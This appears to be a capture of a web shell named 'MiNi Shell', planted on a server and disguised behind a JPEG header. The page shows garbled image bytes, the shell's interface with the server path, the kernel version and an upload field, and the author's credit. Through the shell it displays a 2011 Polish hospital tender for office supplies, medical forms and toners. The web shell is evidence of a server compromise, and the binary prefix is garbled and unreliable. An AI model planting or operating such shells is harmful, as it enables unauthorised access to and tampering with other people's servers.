JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110315/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110315/45092-N-2011.html

<p class="kh_header"><b>Radzymin: Zakup i dostawa artykułów biurowych, kopert i druków medycznych, tuszy i tonerów 2011.</b><br>
<b>Numer ogłoszenia: 45092 - 2011; data zamieszczenia: 15.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej , ul. Konstytucji 3 Maja 17, 05-250 Radzymin, woj. mazowieckie, tel. 022 7865037, faks 022 7865037.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzzoz-radzymin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa artykułów biurowych, kopert i druków medycznych, tuszy i tonerów 2011..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie Nr 1    
Papier POL lux A4 80g/2mm	600 ryz
Papier POL lux A3 80g/2mm	15 ryz
Segregator A4 foliowany  czerwony  75 mm  z szyna met.	50 szt
 Segregator foliowany czarny  75 mm z szyna met.	50 szt.
Segregator A4 foliowany  żółty  75 mm  z szyna met.	50 szt
 Segregator foliowany niebieski  50 mm z szyna met.	50 szt.
Teczka kartonowa niebieska A4  z gumką 	100 szt
Długopis BIC Orange czerwony 	50 szt.
Długopis BIC Orange czarny	50 szt.
Długopis BIC Orange niebieski	50 szt.
Długopis Orange zielony 	20 szt.
Długopis Atlantis niebieski	50 szt.
Marker na bazie wody grubość linii 3 mm czarny	50 szt.
Markier lakierowy grubość linii 2 mm czarny	50 szt.
Marker do tablic suchoście. zestaw 4 kolory	5 szt.
Spinacze biurowe 50 mm	50 op.
Spinacze biurowe 33 mm	100 op.
Koszulka krystaliczna A4 100 szt. op. 	150 op.
Koszulka krystaliczna szeroka A4   25 szt. op.	20 op.
Pineska beczułka	5 op.
Pineska zwykła metalowa	10 op.
Ołówek z gumką 2988 / HB 	24 szt.
Brulion w kratkę 96 k.  A4 twarda okładka 	50 szt.
Brulion w kratkę 96  A5 twarda okładka 	50 szt.
Flamaster czarny  20 szt.
Korektor w długopisie 12 ml.  Tipp-Ex	15  szt.
Korektor w płynie 20 ml. Tipp-Ex	30 szt
Zszywki 24/6 	1000 szt
Zszywki  23/8 	10 op.
Tusz do stempli uniwersalny  czarny 	20 szt.
Zszywacz FC 5505 Leitz na zszywki 24/6  	5 szt.
Dyskietki 3,5 2 HD  TDK  	5 op.
Płyty CD-R  SONY  CAKE 48X  ( op. 50 szt)	10 op.
Skoroszyt wpinany A4 okładka przednia przezro. tylna kolorowa	100 szt.
Teczka kartonowa kolorowa A4  z gumką 	100 szt
Skoroszyt kartono. A4 biały 	500 szt
Grzbiety do bindowania  plastk.  8 mm	1 op
Okładki  A4 przezroczyste do dokumentów służące jako pierwsza strona 	1 op
Okładki skóropodobne A4  służące jako ostatnia strona  ( granatowe)	1 op.
Nożyczki  uniwersalne 
  15,5 cm 	5 szt
Woreczki strunowe 175 x 250 mm 	15 op.
Klej sztyft IMPEGA  20G	30 szt
Taśma TESA Transparent - Film  19 mm 	70 szt
Blok A5 bez okładki  w kratkę 	10 szt.
Notes  samoprzylepny  
51x 38 mm     3 szt w op.	30 op.
Notes samoprzylepny do podajnika  Post-it  76x76	20 szt
Podajnik Millenium model  C2014	2 szt.
Baterie alkaiczne ENERGIZER AAA kod BAK  001   1,5 V 	20 op.
Baterie alkaiczne ENERGIZER AA kod BAK 003  1,5 V  	20 op.
Półki na dokumenty przezroczyste	10 szt
Zakreślasz  fluorescencyjny STABLO BOSS  (4 kolor)	15  op.
Flamastry etui (4 kolory)	20 op.
Przekładki kartonowe 	100 szt.
Linijka 30 cm 	10 szt.
Zeszyt A5    32 kart	50 szt.
Płyn do czyszczenia tablic suchościeralno- magnetycznych	2  szt.
Klipsy do papieru Grand  19 mm 	20 op
Klipsy do papieru Grand  25 mm	20 op
Przybornik na biurko Dual walec z szufladkami symbol 1995	2 szt
Folia zgrzewarek A4	50 ark. 
Mechanizm skoroszytowy 4  op.
Grzbiety wsuwane A4 leitz  (niebieskie)  GBK 127	1 op.
Grzbiety do bindownicy  GBK019 (niebieskie) 	1 op
Temperówka z pojemnikiem 	5 szt
Cienkopis Stabilo Point 88 
Czerwony 40	5  szt.
Cienkopis Stabilo Point 88 
Zielony 36	5 szt.
Cienkopis Stabilo Point 88 
Ciemno niebieski 41	10 szt.
Cienkopis Stabilo Point 88 
Czarny 46	5 szt.
Papier POL lux A4 80g/2mm  mikx kolorów	5 ryz
Dysk DVD +R/R  16x  kod XCK 029   50 szt	1 op.
Gumka Rasoplast	20 szt
 Kredki ołówkowe   24 kolory     5 op.
Kredki świecowe 5 op.
Toner - folia do faksu Panasonic KX-FA57E	5 szt
Blok do flichartów  	2 szt.
Marker permanentny	36 szt.
Marker permanentny wodoodporny	24 szt.

Zadanie Nr 2
Koperty B4 samoklejące białe
250 x 353 mm	500 szt.
Koperty C6 samoklejące białe
175 x 125 mm	1000 szt.
Koperty C4 samoklejące białe
229 x 324 mm	1000 szt.
Koperty B5 samoklejące białe
176 x 250 mm	500 szt.

Zadanie nr 3
Koperty szare do zdjęć RTG 190x250 mm	1000 szt.
Koperty szare do zdjęć RTG  250x311 mm	1000 szt.
Koperty szare do zdjęć RTG 210x410	1000 szt.
Koperty szare do zdjęć RTG 310x410 mm	1000 szt.
Koperty szare do zdjęć RTG  360x360 mm	1200 szt.
Koperty szare do zdjęć RTG 360x410 mm	1200 szt.

Zadanie Nr 4
Faktura VAT  A5	10 bl.
Dowód wpłaty KP	100 bl.
Dowód wpłaty KW	10 bl.
Magazyn wyda	10 bl.
Magazyn przyjmie	10 bl.
Korekta magazynowa  A5	500 szt.
Wniosek o zaliczkę	10 bl.
Nota korygująca VAT nota pełna A5 (kod DRK 049)	2 bl.
Wezwanie do zapłaty A6 DRK  155	5bl.

Zadanie Nr 5
Historia choroby klinika chorób wewnętrznych	1500 szt.
Wkładka do historii choroby	1500 szt
Wkładka do historii choroby układ krążenia i bad. przedm. 	1500 szt.
Indywidualna karta zleceń lekarskich	2000 szt.
Karta gor. Og. Mz/Szp 16	2000 szt.
Skierowanie do szpitala	5000 szt
Skierowanie do poradni specj.	5000 szt.
Skierowanie do poradni diagnost.	5000 szt
Karta statysty. Do karty zgonu	250 szt
Rozkład pracy dla pielęgniarek	150 szt.
Skierowanie do zakładu radiologicznego lekar.	2000 szt.
Zapotrzebowanie indywidu. na krew i środki krwiopochodne	3 bl.
Karta serologiczna  bad. w kierunku kiły	1000 szt.
Spis bielizny wydanej do pralni	5 bl.
Zestawienie dzienne oddziału	15 bl.
Karta wyniku badań 
laborato. w przyp. choroby zakaźnej	100 szt.
Receptariusz szpitalny	10 bl
Karta informacyjna Izby Przyjęć 	1500 szt.
Skierowanie do laboratorium wyszczególnieniem badań ogólnych, badań do bakteriologii i serologii	25000 szt.
Zlecenie na przewiezienie chorego	300 szt.
Książka raportów pielęgniarki	30 szt.
Dziennik pracy ambulatorium	30 szt.
Zaświadczenie o pobycie pacjenta w szpitalu	1000 szt.
Skierowanie do sanatorium	600 szt.
Skierowanie na próbę zgodności krwi	150 szt.
Badanie bakteriologiczne	200 szt.
Księga pracowni analitycznej 	10 szt.
Książka badania laboratoryjnego	10 szt.
Książka do pracowni RTG	5 szt.
Książka gabinetu zabiegowego	2 szt.
Pierwsze odwiedziny pielęgniarki środowiskowej	200 szt.
Odwiedziny pielęgniarki środowiskowej	200 szt.
Deklaracja wyboru lekarza  5 bl.
Rezygnacja z wyboru lekarza	5 bl.
Patronaż   lekarza pediatry	5 bl
Skierowanie na leczenie uzdrowiskowe	5 bl.
Zlecenie transportu sanitarnego 	5 bl.
Wkładka do Karty ciąży A4	500 szt.
Karta przebiegu ciąży i połogu	200 szt.
Historia choroby mała	10000 szt.
Wkładka do historii choroby mała	20000 szt.
Karta zdrowia dziecka	500 szt.
Wkładka do karty zdrowia dziecka	1000 szt.
Książka ewidencji noworodków	5 szt.
Bilans zdrowia dziecka 2 letniego	300 szt.
Bilans zdrowia dziecka 4 letniego	300 szt.
Karta choroby poradni stomatologicznej 	3000 szt.
Recepta na okulary	1000 szt.
Księga chorego na jaskrę	10 bl.
Wynik badania cytologicznego	700 bl.
Wynik badania laboratoryjnego WR	10 bl.
 Lista klasowa	4 bl
Zaśw. o czasie niezdolności do WF	1 bl.
Karta zdrowia ucznia 2xA5	1000 szt.
Karta rozwoju i zdrowia 
6 latków	7 bl.
Karta Bad. lek. ucznia 
kl. III szk. podstawowej  	10 bl.
Karta Bad. lek. ucznia 
kl. I gimnazjum i kl. I  szk. ponadgimnazjalnej	10 bl.
Karta Bad. lek. ucznia 
ostatniej kl. szk. Ponadgimnazjalnej 18 l.	10 bl
Kwalifikacja do nauki pływania	3 bl.
Informacja dotycząca szczepień	5 bl.
Orzeczenie dotyczące kształcenia nauki zawodu	5 bl.
Zaświadczenie lekarskie dla kandydatów do szkół wyższych	2 bl.
Informacja  do lekarza POZ	100 bl.
Skierowanie na zabiegi fizjoterapeutyczne	7000 szt.
Dziennik położnej  część III A4	3 szt.
Księga pracy terenowej pielęgniarki	3 szt.

Zadanie Nr 6
Toner do ksero Canon
Image Runner  2520 	25 szt.
Toner do kserokopiarki
Szarp AR 5516     	5 szt.
Tusz HP C 6578 A   	5 szt.
Tusz HP C 6615D   	7 szt.
Tusz HP C6656A    	40 szt.
Tusz HP C6657A    	35 szt.
Tusz HP C8767E   	30 szt.
Tusz HP C9352A 	15 szt.
Tusz HP C9351A  	15 szt.
Tusz Canon CL-41  	10 szt.
Tusz Canon CL-38    	10 szt.
Tusz Canon PG-37  	10 szt.
Tusz Canon PG-40  	10 szt.
Tusz Canon BX-3     	15 szt.
Tusz HP C 8766E  	20 szt.
Toner HP CB436A   	15 szt.
Toner Oki  B430/B440   na 7000 tyś stron 	30 szt.
Toner Oki C 5650 Y   	10 szt.
Toner Oki C  5650 C  	10 szt.
Toner Oki C  5650 K  	15 szt.
Toner  Oki C 5650 M  	10 szt.
Toner Oki B410   	5 szt.
Toner Oki  MB290   	5 szt.
Samsung ML -2010 PR  	5 szt.
Toner  LP 13A  	10 szt.
Toner LP 12A  	10 szt.
Bęben Oki C 5650  C    	4 szt.
Bęben Oki C 5650  M   	4 szt.
Bęben Oki C 5650  K    	4 szt.
Bęben Oki C 5650  Y    	4 szt.
Bęben Oki  430 DN  	4 szt.
Oki Mb 480   	4 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Artykuły biurowye, koperty, druki medyczne, tusze i tonery.
20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.92.00-2, 30.19.97.13-1, 22.45.80.00-5, 22.45.80.00-5, 22.60.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzzoz-radzymin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w radzyminie ul. Konstytucji 3 Maja 17 05-250 Radzymin  II piętro budynek Przychodni..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2011 godzina 10:30, miejsce: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w radzyminie ul. Konstytucji 3 Maja 17 05-250 Radzymin  II piętro budynek Przychodni..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 22.04.2011.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> koperty pocztowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.92.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> koperty do RTG.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szcegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.97.13-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> druki akcydensowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szcegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.80.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> druki medyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo określone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.45.80.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> tysze i tonery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo okreslone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.60.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com